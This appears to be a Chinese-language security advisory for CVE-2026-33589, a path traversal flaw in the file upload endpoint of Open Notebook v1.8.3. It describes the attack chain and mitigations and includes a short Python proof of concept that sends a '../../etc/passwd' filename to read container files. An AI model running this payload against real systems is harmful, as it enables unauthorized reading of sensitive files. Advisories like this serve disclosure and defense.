IPBUF安全漏洞报告
English
CVE-2026-33589 CVSS 6.5 中危

CVE-2026-33589 Open Notebook路径遍历漏洞

披露日期: 2026-05-07
来源: a6d3dc9e-0591-4a13-bce7-0f5b31ff6158

漏洞信息

漏洞编号
CVE-2026-33589
漏洞类型
路径遍历
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Open Notebook

相关标签

路径遍历Open Notebook文件上传本地文件读取DockerCVE-2026-33589

漏洞概述

Open Notebook v1.8.3版本中被发现存在一处安全漏洞,该漏洞源于文件上传功能模块对用户输入参数缺乏严格的校验机制。经过身份验证的低权限攻击者可以精心构造恶意数据包,利用路径遍历技术绕过目录限制。这使得攻击者能够非法读取Docker容器内部的敏感文件内容。鉴于该漏洞攻击门槛较低且无需用户交互,它对系统的机密性构成了显著威胁,管理员需尽快处理以防数据泄露。

技术细节

该漏洞的核心成因在于Open Notebook v1.8.3在处理文件上传请求时,未能有效过滤用户提供的输入参数。具体而言,应用程序直接使用了用户可控的文件名或路径字段,未对其进行标准化处理或字符黑名单检查,从而导致了路径遍历漏洞的产生。攻击者首先需要获取一个低权限的应用账户,随后在文件上传过程中,通过在文件名或路径参数中插入“../”序列或其他路径遍历符号,将目标路径重定向至系统敏感文件(如/etc/passwd或应用配置文件)。由于服务端逻辑缺陷,系统会将指定路径的文件内容返回给攻击者,而非执行正常的上传操作。尽管该应用通常部署在Docker容器内,限制了逃逸到宿主机的可能性,但容器内的完整文件系统仍暴露在攻击者面前。根据CVSS 3.1评分向量,该漏洞网络攻击向量为N,攻击复杂度为L,privileges required为L,且对机密性影响为高,表明该漏洞易于利用且危害较大。

攻击链分析

STEP 1
侦察
攻击者识别出目标运行的是Open Notebook v1.8.3版本,并确认其文件上传接口。
STEP 2
获取凭证
攻击者注册或获取一个低权限的用户账户,满足漏洞利用的PR:L要求。
STEP 3
构造恶意请求
攻击者修改文件上传请求,在文件名或路径字段中插入路径遍历序列(如"../"),指向敏感文件。
STEP 4
执行攻击
发送构造后的请求至服务器,服务器因未验证输入,处理了路径遍历请求。
STEP 5
数据泄露
攻击者接收服务器响应,获取到Docker容器内目标文件(如/etc/passwd)的内容。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://target:port/api/upload" # Attacker's low privilege cookie/session cookies = { "session": "low_privilege_session_token" } # Path traversal payload in the filename parameter # Attempting to read /etc/passwd from the docker container payload_filename = "../../../../../../etc/passwd" files = { "file": (payload_filename, " malicious content") } response = requests.post(url, files=files, cookies=cookies) if response.status_code == 200 and "root:x" in response.text: print("[+] Exploit successful! Sensitive file content leaked.") print(response.text) else: print("[-] Exploit failed.")

影响范围

Open Notebook v1.8.3

防御指南

临时缓解措施
建议立即将Open Notebook升级到修复了该漏洞的最新版本。如果暂时无法升级,应在网络边界部署WAF规则,拦截包含路径遍历特征的恶意请求,并严格限制对文件上传接口的访问权限,仅允许内部可信IP调用。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表